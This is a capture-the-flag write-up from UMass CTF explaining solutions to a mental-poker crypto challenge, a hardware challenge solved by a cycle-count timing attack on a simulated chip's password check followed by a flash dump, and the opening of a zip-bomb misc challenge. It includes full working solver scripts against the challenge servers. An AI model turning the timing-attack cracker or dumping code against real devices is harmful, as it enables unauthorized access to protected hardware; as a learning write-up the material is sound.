In spite of my otherwise packed schedule, I managed to set aside some time this past weekend to play UMass CTF with my team L3ak. As a team we placed first, and I personally cleared out the entire web category, several from OSINT and misc, and two of the three hardware challenges. I had a lot of fun with a bunch of the challenges and chose four of my favorites to write about.

Brainrot Gamba

This challenge was the hardest from the crypto category, and went unsolved until the end. It was the only challenge my team didn’t solve during the event. I finished my solution a few hours after it ended. My solution was different from what the author intended, so I felt it deserved a writeup anyway.

The gist is that it’s an implementation of mental poker, where the goal is for the opponent to have quad-aces and for us to have a royal flush. The main function of the server program looks like this:

hash_key = os.urandom(16)
print(f"I commit to this key: {AES.new(hash_key, AES.MODE_ECB).encrypt(int.to_bytes(0, length=16)).hex()}")
iv = bytes.fromhex(input("Please commit to an IV!"))
deck = get_deck('Give me a deck of cards: ', 52)
safely_hashed_deck = {ghash(bytes.fromhex(s), hash_key, iv): c for c, s in zip(normal_deck, shuffle(deck))}
if len(safely_hashed_deck) != 52:
    raise ValueError("You didn't give me unique cards!")
print(f"Here's the deck we're using: {json.dumps([hex(k) for k in safely_hashed_deck])}")
print(f"You can check that the key I used matches my commitment: {hash_key.hex()}")

print("Now, let's shuffle the deck!")
global_d, deck = encrypt_deck(safely_hashed_deck)
print(json.dumps(shuffle(deck)))
deck = get_deck('Shuffle and encrypt, then give me back the deck: ', 52)
deck = decrypt_deck(deck, global_d)
my_keys, deck, key_hashes = encrypt_cards(deck, hash_key, iv)
print(
    "I removed my global encryption, and added individual encryption. Here's my deck now, along with the hashes of the encryption: ")
print(json.dumps(deck))
print(json.dumps(key_hashes))
deck = get_deck('Remove your global encryption, add your own individual encryption, then give me back the deck: ',
                52)
opponents_hashes = get_deck("Also, give me the hash to all your keys to make sure you're not cheating: ", 52)

print("Now, let's play poker!")
print("Here are the keys to your cards: ", json.dumps([hex(my_keys[i]) for i in [0, 1]]))
opp_keys = get_deck("Give me my first two keys: ", 2)
hand = {decrypt_cards(deck[i], my_keys[i], opp_keys[i - 2], hash_key, opponents_hashes[i], safely_hashed_deck, iv)
        for i in [2, 3]}
if len(hand) < 2:
    raise ValueError("You didn't give me unique cards!")
if not all(card[0] == 'A' for card in hand):
    raise ValueError("I'm not playing until I get aces!")

print("Here are the keys to the streets: ", json.dumps([hex(my_keys[i]) for i in [4, 5, 6, 7, 8]]))
opp_keys = get_deck("Give me my street keys: ", 5)
street = {decrypt_cards(deck[i], my_keys[i], opp_keys[i - 4], hash_key, opponents_hashes[i], safely_hashed_deck, iv)
            for i in [4, 5, 6, 7, 8]}
if len(street.union(hand)) < 7:
    raise ValueError("You didn't give me unique cards!")
if not {'Ac', 'Ah', 'Ad', 'As'} <= street.union(hand):
    raise ValueError("I'm not betting until I get quad aces!")

print("Here are the keys to my cards: ", json.dumps([hex(my_keys[i]) for i in [2, 3]]))
print("Read em' and weep!")

opp_keys = get_deck("Give me your first two keys: ", 2)
opp_hand = {decrypt_cards(deck[i], my_keys[i], opp_keys[i], hash_key, opponents_hashes[i], safely_hashed_deck, iv)
            for i in [0, 1]}
if len(street.union(opp_hand).union(hand)) < 9:
    raise ValueError("You didn't give me unique cards!")
if not any({rank + suit for rank in 'TJQKA'} <= street.union(opp_hand) for suit in 'chds'):
    raise ValueError("I don't know what you think you had but it's clearly not beating aces!")

print("dang, i should stop gambling.")
with open('flag.txt', 'r') as f:
    print(f.readline())

Breaking down the source code, it does the following things:

  1. Generates a secure random 16-byte AES key, and gives us the encryption of 16 null bytes using it
  2. Asks us for an IV
  3. Asks us for a list of 52 numbers to use as the base deck and runs the ghash function on them
  4. Randomly matches one of the hashed values to a card value, and then gives us the ghashed keys in order (so we know which ghash goes with which card)
  5. Gives us the randomly generated AES key so that we can validate the ghashes match what we expect
  6. Encrypts the deck using the same key for every card, shuffles it, gives it to us, and asks us to do the same
  7. Decrypts the server’s encryption of the double-encrypted deck, and then adds new encryption on a per-card basis
  8. Gives us the current deck and the hashes of the individual keys, asks us to undo our encryption, re-encrypt per-card, and provide the hashes to prove what our keys are
  9. In multiple steps, assigns us the first two cards, itself the next two, and the next five as community cards
  10. Asks for our keys, verifies their hashes, and decrypts the cards
  11. Raises an error if the server doesn’t have two aces in its personal hand
  12. Raises an error if the other two aces aren’t in the community cards
  13. Raises an error if we don’t have a royal flush
  14. Prints the flag

The helper functions look like this

normal_deck = [''.join(card) for card in itertools.product("23456789TJQKA", "chds")]

# https://www.rfc-editor.org/rfc/rfc3526#section-3
p = int(""" FFFFFFFF FFFFFFFF C90FDAA2 2168C234 C4C6628B 80DC1CD1
      29024E08 8A67CC74 020BBEA6 3B139B22 514A0879 8E3404DD
      EF9519B3 CD3A431B 302B0A6D F25F1437 4FE1356D 6D51C245
      E485B576 625E7EC6 F44C42E9 A637ED6B 0BFF5CB6 F406B7ED
      EE386BFB 5A899FA5 AE9F2411 7C4B1FE6 49286651 ECE45B3D
      C2007CB8 A163BF05 98DA4836 1C55D39A 69163FA8 FD24CF5F
      83655D23 DCA3AD96 1C62F356 208552BB 9ED52907 7096966D
      670C354E 4ABC9804 F1746C08 CA237327 FFFFFFFF FFFFFFFF""".replace(' ', '').replace('\n', ''), 16)


def shuffle(l):
    return [x for x in sorted(l, key=lambda x: int.from_bytes(os.urandom(2)))]


def ghash(data, key, iv):
    cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
    cipher.update(data)
    _, tag = cipher.encrypt_and_digest(b'')
    result = int.from_bytes(tag)
    if result < 1 << 127:
        result += 1 << 128
    return result ** 2


def encrypt(msg, e):
    return pow(msg, e, p)


def decrypt(msg, d):
    return pow(msg, d, p)


def random_key_pair():
    e = getRandomNBitInteger(p.bit_length() // 2) * 2 + 1
    d = pow(e, -1, p - 1)
    return e, d


def encrypt_deck(deck):
    e, d = random_key_pair()
    return d, [hex(encrypt(card, e)) for card in deck]


def decrypt_deck(deck, d):
    return [decrypt(int(card, 16), d) for card in deck]


def encrypt_cards(deck, hash_key, iv):
    keys = [random_key_pair() for _ in range(52)]
    return [key[1] for key in keys], [hex(encrypt(card, key[0])) for card, key in zip(deck, keys)], [
        hex(ghash(hex(key[1]).encode(), hash_key, iv)) for key in keys]


def decrypt_cards(card, my_key, opp_key, hash_key, hash_value, safely_hashed_deck, iv):
    opp_key = int(opp_key, 16)
    if hex(ghash(hex(opp_key).encode(), hash_key, iv)) != hash_value:
        raise ValueError("Your key has does not match your commitment!")
    decrypted = decrypt(decrypt(int(card, 16), opp_key), my_key)
    if decrypted not in safely_hashed_deck:
        raise ValueError("Your key does not decrypt correctly!")
    return safely_hashed_deck[decrypted]


def get_deck(msg, size):
    resp = input(msg)
    if len(resp) > 100000:
        raise ValueError("yeah i'm not parsing that.")
    deck = json.loads(resp)
    if not isinstance(deck, list):
        raise ValueError('You did not give me a list!')
    if len(deck) != size:
        raise ValueError("You did not give me the correct number of items!")
    if not all(isinstance(card, str) for card in deck):
        raise ValueError("You didn't give me valid items!")
    return deck

The things to note here are that the prime being used is a known RFC 3526 prime, the encryption is an exponentiation cipher similar to RSA (but with a prime modulus instead of a composite one), and the ghash is the GCM tag of the data (with the known key and IV), but shifted by 1<<128 if it’s less than 1<<127, and then squared.

There are a couple potential avenues of attack that I considered here, those being:

  1. Find a key that decrypts a ciphertext to a specific plaintext, and then also has a ghash collision
  2. Identify the encrypted cards after they’re shuffled, and return them in a calculated order

The former is hard, and would require solving the discrete log problem. The second option, however, is more interesting. There would be a couple potential ways to approach this, including trying to crack the encryption outright and abusing some property to identify encrypted values relative to each other. Trying to recover the e or d value again runs us into discrete log, but there are some properties that could let us identify certain numbers relative to each other.

For our toy example, let’s use p = 4096760407, e = 70409, and d = 1566228701. Our encryption and decryption functions are the same as from the challenge, and look like this:

def encrypt(msg, e):
    return pow(msg, e, p)

def decrypt(msg, d):
    return pow(msg, d, p)

If we encrypt random plaintexts, there’s no usual way for us to decrypt them without knowing the value of e (which again, in this challenge is far too big to brute force). For example, if we have the plaintext numbers 1722030 and 3444060, their encryptions are 2520216226 and 3903378220, with no clear way of identifying which is which without e. However, it’s notable that 3444060 is a multiple of 1722030. Dividing the two gives the quotient 2. What happens when we divide the encrypted values? Divison in a finite field is the same thing as multiplication by the inverse (mod p), which we can do like this:

m1 = 2520216226
m2 = 3903378220
q = m2*pow(m1, -1, p) % p
print(q)

The output here is 900051483, which at first looks unhelpful, but notably is equivalent to the value of encrypt(2, e). The property we can abuse here is that if a / b == c is true, encrypt(a) / encrypt(b) === encrypt(c) (mod p). However, without knowing e, we still can’t find the value of encrypt(2, e) on its own to match against. Luckily we’re given 52 numbers to encrypt, not just two. Instead of picking one pair with the same quotient, if we pick two (say, (1722030, 3444060) and (9420822, 18841644)), we can see that dividing their encrypted values gives matching quotients

m3 = encrypt(9420822, e)
m4 = encrypt(18841644, e)
q2 = m4*pow(m3, -1, p) % p
print(q2)

This gives the same output as the first pair, 900051483. On its own, this isn’t directly helpful. All this would allow us to do is identify two pairs of numbers in the encrypted deck (so, 4 total), and we’d know that those 4 cards were 4 specific cards (in some order), but we’d have no way of knowing which pair was which, or which card was which within the pair. Also, if we tried adding more values with different quotients, we would run into the additional problem that there’s no way to indicate which group is which, because while we can match pairs by their quotients, there’s still no way to confirm which quotient is which.

One potential way around this is to make chains of numbers, instead of simply pairs. The idea here would be to select a common ratio x such that m_n = m_0 * x**n. If we could do this, we could identify the specific order of the numbers by dividing all of them by every other, and keeping track of the number of times each value shows up. There would be two modes of this collection, encrypt(x) and encrypt(1/x). There would be no way of knowing which direction the chain goes, but if all of the cards are in a single chain, a 50% chance of guessing right is more than good enough.

The obvious way to attempt to exploit this would be to start with m_0 = 1 and x = 2, where our plaintext values are the powers of two. This would solve the problem, and there are more than enough powers of two within the bounds of the GCM tag for this to work. The issue arises in that the GCM tag is shifted by 1<<128 if it’s less than 1<<127. Adding a constant like that breaks the divisibility property we’re relying on, and cutting our potential space to be between two powers of two would ruin our plan.

It’s important to note that given the encryption of null bytes with the hash_key, as we are, along with controlling the IV, is sufficient to easily manufacture numbers that will give us arbitrary GCM tags. Code to do that looks like this:

from sage.all import *

x = GF(2)["x"].gen()
gf2e = GF(2 ** 128, name="y", modulus=x ** 128 + x ** 7 + x ** 2 + x + 1)

def _to_gf2e(n):
    return gf2e([(n >> i) & 1 for i in range(127, -1, -1)])

def _from_gf2e(p):
    n = p.integer_representation()
    ans = 0
    for i in range(128):
        ans <<= 1
        ans |= ((n >> i) & 1)
    return ans

def inverse_ghash(key, vals):
    p = _to_gf2e(0)
    key = int.from_bytes(key, 'big')
    k = _to_gf2e(key)
    inv_k = 1/k

    p *= inv_k
    p -= _to_gf2e(8 * 16)

    p *= inv_k
    iv = _from_gf2e(p)
    iv = iv.to_bytes(16, 'big')

    result = []
    for i in vals:
        i ^= key
        p = _to_gf2e(i)
        p *= inv_k
        p -= _to_gf2e(((8 * 16) << 64))
        p *= inv_k
        result.append(_from_gf2e(p).to_bytes(16, 'big'))
    return iv, result

I spent a while trying to find a way around the shift issue, and after a while the solution clicked - our common ratio x doesn’t have to be an integer. There’s nothing stopping us from using a fractional ratio, as long as the chain is all integers. The math works the same. Between 1<<127 (the bound to not run into the shift) and 1<<128 (the max value of the GCM tag), the largest integer chain you can find with a common ratio is allegedly around 25 long. Some short research of math I don’t understand that I did after I solved this would suggest that the optimal ratio is around 36/35, but when messing around with the problem trying to find something that worked well enough I landed on 1.02, and the longest chain I could find was 23. I found the chain of numbers using z3, like this

from z3 import *
vars = [Int(f'x_{i}') for i in range(23)]
c = 1.02
s = Solver()
for i,x in enumerate(vars):
    s.add(
        x >= (1<<127),
        x < (1<<128)
    )
    if i > 0:
        s.add(
            x == c*vars[i-1]
        )
if s.check() == sat:
    m = s.model()
    for i in range(23):
        print(f'{m[vars[i]]},')
else:
    print("no solution")

23 is a fair bit less than 52, so this alone wasn’t sufficient. What I was able to do to get around this was generate three chains of different lengths. I used one that was 23 long, one that was 22 long, and one that was 7 long. Using the length of the chain to figure out its order is somewhat hacky, but works well enough.

Even though 1.02 isn’t an integer, the strategy to find common ratios works exactly the same. These were the 52 values I ended up using:

vars = [
    190734863281250000000000000000000000000,
    194549560546875000000000000000000000000,
    198440551757812500000000000000000000000,
    202409362792968750000000000000000000000,
    206457550048828125000000000000000000000,
    210586701049804687500000000000000000000,
    214798435070800781250000000000000000000,
    219094403772216796875000000000000000000,
    223476291847661132812500000000000000000,
    227945817684614355468750000000000000000,
    232504734038306642578125000000000000000,
    237154828719072775429687500000000000000,
    241897925293454230938281250000000000000,
    246735883799323315557046875000000000000,
    251670601475309781868187812500000000000,
    256704013504815977505551568750000000000,
    261838093774912297055662600125000000000,
    267074855650410542996775852127500000000,
    272416352763418753856711369170050000000,
    277864679818687128933845596553451000000,
    283421973415060871512522508484520020000,
    289090412883362088942772958654210420400,
    294872221141029330721628417827294628808,

    170145034790039062500000000000000000000,
    173547935485839843750000000000000000000,
    177018894195556640625000000000000000000,
    180559272079467773437500000000000000000,
    184170457521057128906250000000000000000,
    187853866671478271484375000000000000000,
    191610944004907836914062500000000000000,
    195443162885005993652343750000000000000,
    199352026142706113525390625000000000000,
    203339066665560235795898437500000000000,
    207405847998871440511816406250000000000,
    211553964958848869322052734375000000000,
    215785044258025846708493789062500000000,
    220100745143186363642663664843750000000,
    224502760046050090915516938140625000000,
    228992815246971092733827276903437500000,
    233572671551910514588503822441506250000,
    238244124982948724880273898890336375000,
    243009007482607699377879376868143102500,
    247869187632259853365436964405505964550,
    252826571384905050432745703693616083841,
    170145034790039062499999960937500000000,

    173547935485839843749999960156250000000,
    177018894195556640624999959359375000000,
    180559272079467773437499958546562500000,
    184170457521057128906249957717493750000,
    187853866671478271484374956871843625000,
    191610944004907836914062456009280497500,
    195443162885005993652343705129466107450
]

My function to find and build these chains looked like this:

def find_order(encs):
    quotients = {}
    for i in encs:
        for j in encs:
            if i == j:
                continue
            q = i*pow(j, -1, p) % p
            if q in quotients:
                quotients[q] += 1
            else:
                quotients[q] = 1

    keys = [i for i in quotients]
    keys.sort(key=lambda x : quotients[x], reverse=True)
    q1 = keys[0]
    q2 = keys[1]

    maps = {}
    for c in encs:
        a = None
        b = None
        for o in encs:
            if c == o:
                continue
            if c*pow(o, -1, p) % p == q1:
                a = o
            elif c*pow(o, -1, p) % p == q2:
                b = o
        if a is not None or b is not None:
            maps[c] = {'a': a, 'b': b}

    starts = []
    for m in maps:
        if maps[m]['a'] is None:
            starts.append(m)

    orders = []
    for start in starts:
        order = [start]
        next = maps[start]['b']
        while next is not None:
            order.append(next)
            next = maps[next]['b']
        orders.append(order)

    orders.sort(key=lambda x: len(x), reverse=True)
    order = []
    for o in orders:
        order.extend(o)
    return order

It’s fairly hacky and could probably be cleaner, but it works more than well enough to suffice. My code to interact with the server and solve the challenge was as follows:

# io = process(["python3", "chall.py"])
io = remote("ctf.umasscybersec.org", 7002)
io.recvuntil(b'I commit to this key: ')
hash_key_enc = bytes.fromhex(io.recvuntil(b'\n').decode().strip())
io.recv()
iv, cards = inverse_ghash(hash_key_enc, vars)
hex_cards = [i.hex() for i in cards]
io.sendline(iv.hex().encode())
io.sendline(json.dumps(hex_cards).encode())
io.recvuntil(b"Give me a deck of cards: Here's the deck we're using: ")
safely_hashed_deck_keys = [int(i,16) for i in json.loads(io.recvuntil(b'\n').decode().strip())]
safely_hashed_deck = {k: v for k, v in zip(safely_hashed_deck_keys, normal_deck)}
safely_hashed_deck_reverse = {v : k for k, v in zip(safely_hashed_deck_keys, normal_deck)}
io.recvuntil(b"You can check that the key I used matches my commitment: ")
hash_key = bytes.fromhex(io.recvuntil(b'\n').decode().strip())
orig_ghashes = [x**2 for x in vars]
io.recvuntil("Now, let's shuffle the deck!\n")
shuffled_deck = json.loads(io.recvuntil(b'\n').decode().strip())
shuffled_deck = [int(i,16) for i in shuffled_deck]
ordered = find_order(shuffled_deck)
ordered_known = ordered[:]
ordered.extend([i for i in shuffled_deck if i not in ordered])
encrypted_deck_mappings_reverse = {a:safely_hashed_deck[b] for a,b in zip(ordered_known, orig_ghashes)}
encrypted_deck_mappings = {safely_hashed_deck[b]:a for a,b in zip(ordered_known, orig_ghashes)}
cards_ordered = [
    encrypted_deck_mappings["Td"],
    encrypted_deck_mappings["Jd"],
    encrypted_deck_mappings["Ac"],
    encrypted_deck_mappings["Ah"],
    encrypted_deck_mappings["As"],
    encrypted_deck_mappings["Ad"],
    encrypted_deck_mappings["Qd"],
    encrypted_deck_mappings["Kd"],
]
cards_ordered.extend([encrypted_deck_mappings[i] for i in encrypted_deck_mappings if encrypted_deck_mappings[i] not in cards_ordered])
guessed_deck_order = [encrypted_deck_mappings_reverse[i] for i in cards_ordered]
hexed_ordered_deck = json.dumps([hex(i) for i in cards_ordered])
io.sendline(hexed_ordered_deck.encode())
io.recvuntil(b"Here's my deck now, along with the hashes of the encryption: \n")
new_enc = io.recvuntil(b'\n').strip()
io.recv()
io.sendline(new_enc)
io.recv()
my_hashes = [hex(ghash(hex(i).encode(), hash_key, iv)) for i in [1]*52]
io.sendline(json.dumps(my_hashes).encode())
io.recvuntil(b'Here are the keys to your cards: ')
opp_keys = [hex(i) for i in [1]*52]
keys_0_1 = [i for i in json.loads(io.recvuntil(b'\n').strip().decode())]
encrypted_deck = [i for i in json.loads(new_enc.decode())]
io.recv()
io.sendline(json.dumps(opp_keys[:2]).encode())
io.recvuntil(b'Give me my street keys: ')
io.sendline(json.dumps(opp_keys[:5]).encode())
io.recvuntil(b'Give me your first two keys: ')
io.sendline(json.dumps(opp_keys[:2]).encode())
io.interactive()

Exactly as I expect, on average one out of every two times I run this code it works, and it prints out the flag

gamba script running

The flag is UMASS{call-1-800-GAMBLER-if-you're-in-the-US-and-need-help}.

This challenge was fun and strengthened my understanding of the properties of finite fields. I’m somewhat disappointed that I barely didn’t solve it in time, but given that no one else solved it and my team placed first regardless, I can’t really complain too much.

FCSIGN

FCSIGN was one of three challenges in the hardware category, and one of two that I solved. This challenge had 3 total solves by the end of the event, so I was pretty proud of my solution as hardware isn’t a category I’ve attempted before. The challenge description reads

What’s up homie, it’s Brody. I got one of those decomissioned signs from a motivational facility for something called UMassCTF. You think there’s anything cool in here? Got it hooked up in my lab if you want to mess around with it…

Run python client.py with your code.

and there are three attachments, client.py, datasheet.md, and datasheet.pdf. There’s also a hint that says

This chip is a bit quiet. I wonder if I could get it to talk…

Inspecting the files, datasheet.md seems to be the exact same as datasheet.pdf but in text form instead of PDF form. I somewhat suspect that this was done to let people easily give the datasheet to an LLM, but I’m not sure. For our purposes, the markdown is easier to read. client.py looks like this

import asyncio
import websockets
import json
import base64
import struct

async def connect(url):
    return await websockets.connect(url)

async def send_data(socket, data):
    await socket.send(json.dumps({
        'data' : base64.b64encode(data).decode('ascii')
    }))

async def receive_data(socket):
    response = await socket.recv()
    message = json.loads(response)
    return base64.b64decode(message['data']), message['cycles']

async def main():
    # Example test code...
    socket = await connect('ws://hardware.ctf.umasscybersec.org:10004')

    # Here is an example on how to interact with the target.
    await send_data(socket, b'\x12\x34\x56\x78')

    # This is for receiving the data and the cycle count...
    data, cycles = await receive_data(socket)

    return 0

if __name__ == "__main__":
    asyncio.run(main())

and the datasheet begins with

The UK47XD is an 32bit microcontroller designed for secure embedded applications. It features a simple memory layout, UART-based communication, and built-in security features to prevent tampering and unauthorized code execution. It is primarily used in the lighting industry.

Looking up the name of the chip doesn’t reveal anything, so it’s reasonable to assume that it was designed for this challenge. It’s not truly clear, and I don’t think it really matters, but I find it likely that there’s not truly a chip on the other end of this (like the other hardware challenge probably had). The unused import struct in the client.py sort of implies that there’s just a python program on the other end of this simulating our hypothetical chip. Reading the datasheet in more detail, it reveals the following:

Programming Mode

The UK47XD can be programmed over UART. In order to signal to the processor that you would like to interact with it over UART, simply send the bytes [0x55, 0x0, 0xC1, 0x0] within 5 seconds of booting the processor. The processor should then respond with an acknowledgement packet.

Programming Mode Commands

Packet Format

The transport packet format for all transactions is as follows:

struct Packet {
   uint8_t HEAD; // 0x33
   uint16_t LEN; // Length of data that comes after this field, in little endian.
   PACKET_INTERNAL_DATA DATA; // Data that is stored here
}

struct PACKET_INTERNAL_DATA {
   COMMANDS CMD; // Command Index
   RESPONSES STATUS; // Status, used by the system whenever something goes wrong.
   uint8_t ARGS[LEN - 2]; // The bytes for the arguments. It will be LEN - 1.
}

Command Indices

typedef enum {
   UNKNOWN = 0x0,
   COMM_INIT = 0x3,
   SET_CHIP_FREQ = 0x5,
   ID_AUTHENTICATION = 0x34,
   READ = 0x69,
} COMMANDS;

Response/Status Indices

typedef enum {
   ACK = 0x50,
   INVALID_COMMAND = 0x80,
   FLOW_ERROR = 0x81,
   UNAUTHORIZED = 0x82,
   INVALID_FREQUENCY = 0x83,
   INVALID_ID_LEN = 0x84,
   INVALID_ADDRESS = 0x87,
   INVALID_ADDRESS_ALIGNMENT = 0x88,
} RESPONSES;

The datasheet also gives us instructions on how to interact with the chip

Commands.COMM_INIT

Initializes communication with the processor over UART. This must be sent before any other command is sent, otherwise you will receive a packet with a FLOW_ERROR. Upon success, you will receive an acknowledgement back from the system.

Example packet structure: [0x33, 0x2, 0x0, 0x3, 0x0]

Commands.SET_CHIP_FREQ

Sets the processor speed in megahertz. This must be sent after the COMM_INIT command. Upon success, you will receive an acknowledgement back from the system. You must use either 8 or 16 MHz, as these are the only two operating frequencies.

Example packet structure (to set to 8 MHz): [0x33, 0x5, 0x0, 0x5, 0x00, 0x12, 0x7A, 0x00]

Commands.ID_AUTHENTICATION

Unlocks the chip for reading. This must be sent after the COMM_INIT command, and the SET_CHIP_FREQ, in that order. Upon success, you will receive an acknowledgement back from the system. This cannot be bruteforced; if an attempt is made, the chip is wiped for security reasons (see below).

Example packet structure (assuming the password is DEADBEEFDEADBEEF): [0x33, 0x11, 0x0, 0x34, 0x44, 0x43, 0x41, 0x44, 0x42, 0x45, 0x45, 0x46, 0x44, 0x43, 0x41, 0x44, 0x42, 0x45, 0x45, 0x46]

Commands.READ

Reads 0x400 bytes from a region. This must be sent after the unlocking the chip (see ID_AUTHENTICATION). Upon success, you will receive an acknowledgement back from the system, containing the 0x400 bytes.

Example packet structure (reading from 0x112233): [0x33, 0x5, 0x0, 0x69, 0x33, 0x22, 0x11, 0x00]

It elaborates on what it means by “this cannot be bruteforced” in a note at the end

  • An ID can be used to secure your processor. This is a 16 byte ID consisting of CAPITAL alphabetical characters ‘A’ through ‘Z’. If a user attempts to bruteforce this password, the chip will be erased, preserving the contents.

It’s still sort of unclear to me what “if a user attempts to bruteforce this password, the chip will be erased” means, but from what I observed from the behavior of the server I can gather that it means the password is randomzied for every connection. The datasheet also gives us an idea of the memory ranges we’re supposed to dump

Memory Map

The memory map layout which programmers can access is organized as follows:

Address Range Description
0x0000–0x036F Boot Section
0x0370–0x0EDBFF Application Flash (User Area)

Note: Any access to any other addresses will result in a hard fault, requiring a reboot of the processor.

As far as I could tell this wasn’t referenced anywhere in the datasheet, but the challenge server returns a value labeled cycles along with the response data. It’s reasonable to assume that the intended way to solve the challenge is to get around the ID_AUTHENTICATION requirement, allowing us to dump the flash. With nothing else obvious to go on, I made an assumption - the “chip” might be using something like strcmp() to compare the password. This would be vulnerable to a timing attack, where the response would take longer depending on how many initial bytes match. Normally this would be impossible to exploit remotely because of the noise introduced by the server being thousands of miles away, but the challenge server here very helpfully tells us the exact number of CPU cycles consumed, which makes it substantially easier. This is also hinted at by allowing us to control the clock speed. The values we’re allowed (8 and 16 MHz) would be far too fast to matter remotely, but if this was a real chip we were trying to break into in person, it might let us execute a real timing attack.

From experimenting with it, the cycles number is cumulative, rather than being the cycle count for the most recent command. The first thing I did was define helper functions for communicating with the server. This was based on the datasheet, and was fairly self-explanatory. I was feeling lazy and this part was trivial, so I used an LLM to build most of it.

import asyncio, websockets, json, base64, struct, string
from enum import IntEnum
from typing import Dict, Any

URL = 'ws://hardware.ctf.umasscybersec.org:10004'
FLASH_END   = 0x0EDBFF
PAGE        = 0x400

class COMMANDS(IntEnum):
    UNKNOWN           = 0x00
    COMM_INIT         = 0x03
    SET_CHIP_FREQ     = 0x05
    ID_AUTHENTICATION = 0x34
    READ              = 0x69

class RESPONSES(IntEnum):
    ACK                     = 0x50
    INVALID_COMMAND         = 0x80
    FLOW_ERROR              = 0x81
    UNAUTHORIZED            = 0x82
    INVALID_FREQUENCY       = 0x83
    INVALID_ID_LEN          = 0x84
    INVALID_ADDRESS         = 0x87
    INVALID_ADDRESS_ALIGNMENT = 0x88

def unpack_packet(buf: bytes) -> Dict[str, Any]:
    head, length = struct.unpack_from('<BH', buf, 0)
    expected_total = 3 + length
    data = buf[3:expected_total]
    cmd_val, status_val = struct.unpack_from('<BB', data, 0)
    args = data[2:]
    try:
        cmd = COMMANDS(cmd_val)
    except ValueError:
        cmd = COMMANDS.UNKNOWN
    try:
        status = RESPONSES(status_val)
    except ValueError:
        status = None
    return {
        'HEAD': hex(head),
        'LEN': length,
        'CMD': cmd,
        'STATUS': status,
        'ARGS': args
    }

def b64(b): return base64.b64encode(b).decode()
def b64d(s): return base64.b64decode(s)

async def tx(ws, raw: bytes):
    await ws.send(json.dumps({'data': b64(raw)}))

async def rx(ws):
    rsp = json.loads(await ws.recv())
    return b64d(rsp['data']), rsp['cycles']

def pkt(cmd: int, args=b''):
    body = bytes([cmd]) + args
    return bytes([0x33]) + struct.pack('<H', len(body)) + body

async def handshake(ws):
    await tx(ws, bytes([0x55,0x00,0xC1,0x00]))
    data, cycles = await rx(ws)
    return data, cycles

async def comm_init(ws):
    await tx(ws, pkt(0x03))
    data, cycles = await rx(ws)
    return data, cycles

async def set_freq(ws, mhz=16):
    await tx(ws, pkt(0x05, struct.pack('<I', mhz*1_000_000)))
    data, cycles = await rx(ws)
    return data, cycles

async def auth(ws, guess: bytes):
    await tx(ws, pkt(0x34, guess)) 
    data, cycles = await rx(ws)
    status = data[4]
    return status,data, cycles

async def read_page(ws, addr):
    packet = pkt(0x69, struct.pack('<I', addr))
    await tx(ws, packet)
    data, _ = await rx(ws)
    packet = unpack_packet(data)
    return packet['ARGS']

async def dump_flash(ws):
    all_bytes = bytearray()
    addr = 0
    while addr <= FLASH_END:
        page = await read_page(ws, addr)
        all_bytes.extend(page)
        addr += PAGE
        print(f"dumped {hex(addr)} / {hex(FLASH_END)} ({len(page)})")
        with open("flash.bin", "wb") as f:
            f.write(all_bytes)

async def crack_password(ws, prev_cycles):
    ...

crack_password() is left as a stub for the time being. I also wrote a main function to orchestrate it once crack_password got implemented:

async def main():
    async with websockets.connect(URL) as ws:
        prev_cycles = 0
        _, cycles = await handshake(ws)
        prev_cycles = cycles
        _, cycles = await comm_init(ws)
        prev_cycles = cycles
        _, cycles = await set_freq(ws)
        prev_cycles = cycles
        secret_id = await crack_password(ws, prev_cycles)
        print(f"password found: {secret_id.decode()}")
        await dump_flash(ws)

asyncio.run(main())

This follows the order as defined in the datasheet of the handshake to put it into programming mode, the init packet, the frequency packet, the password, and then the commands to read flash.

Initially I used a fresh socket connection for every crack attempt, but I quickly realized that the password changes on every connection, so I shouldn’t do that. With only ASCII A-Z in the character set and knowing the password is 16 bytes, the timing attack should only require 416 attempts at most. My code is, as always, fairly scuffed, but this is what I managed to make work for implementing the attack:

async def crack_password(ws, prev_cycles):
    known = b''
    for pos in range(16):
        best = None; best_cycles = -1
        for ch in string.ascii_uppercase:
            guess = known + ch.encode() + b'\x00'*(15-pos)
            status,data, cycles = await auth(ws, guess)
            op_cycles = cycles-prev_cycles
            prev_cycles = cycles
            print("auth:",unpack_packet(data), op_cycles, status)
            if op_cycles > best_cycles:
                best_cycles, best = op_cycles, ch
            if status == 80:
                return guess
        known += best.encode()
        print(f"found byte {pos}: {best} (cycles={best_cycles})")
    return known

For each position, it figures out which next letter takes the most time to check. There should be one that takes longer than the rest, and this identifies it as the correct letter.

When it came to dumping the flash, initially I tried starting from 0x370 like the datasheet suggests, but got INVALID_ADDRESS_ALIGNMENT as a response. Presumably the bytes between 0x370 and 0x400 are important, so I tried starting from 0x0 instead. The datasheet says

As stated before, the bootrom and other secure assets cannot be read out, only user area

so I assumed this wouldn’t work, but it did so I just ran with it. Running my script gave me a flash.bin that was 962560 bytes long, which was exactly what I expected. Looking at the bytes file I could see a lot of ASCII text, in what seemed to be markdown and C source code, as well as a lot of non-ASCII bytes with some associated PNG signatures (PNG, IHDR, and IEND). At first I tried carving the image bytes out myself in a hex editor, but I did something wrong and they were corrupted. I then realized I should just binwalk the file to see what it was really supposed to be, which told me my answer pretty clearly:

binwalking flash.bin, showing a tar archive

The identified tar archive started at 0x371, which is one byte after the alleged start of the flash space. Running binwalk again with the -e flag extracted the contents:

tree of the extracted tar archive

frames.xz being another archive explained why just carving out the bytes gave something corrupted. Extracting it properly with tar -xvf _flash.bin.extracted/firmware/frames.xz left me with four images:

extracted frames

Three out of four of the images appeared to just be random memes, but frame-2.png had the flag drawn on it

frame with the flag

The flag was UMASS{un(_b3_w1l1n_w1th_s1d3ch4nn3l1n_XT60WWSC}

Pandora

I found this challenge pretty silly and enjoyable. It’s the sort of random misc thing that’s fun and novel, and made me think about how to approach it. The challenge description was

Surprise, surprise! Note: The file can be considered malicious. Handle with care.

and there was a single attachment, pandora.zip, which was about 11MB in size.

Inspecting the zip file showed immediately what was up. There was another zip file inside it called archive.zip, and inside that I found this:

zip bomb

Their packed sizes differed quite a bit, but of the 42 files inside the archive, all of them would extract to be about 275 gigabytes in size. This was a zip bomb. Looking at the raw bytes of archive.zip, I could pretty clearly see where the real data in each chunk stopped and where the bomb started.

repeating data

It seemed like these would extract to some repeating nonsense. The important parts of the files seemed to be at the start. I started extracting the first one and then stopped it nearly immediately, and the partially extracted file started with

The Project Gutenberg eBook of The Complete Works of William Shakespeare
    
This ebook is for the use of anyone anywhere in the United States and
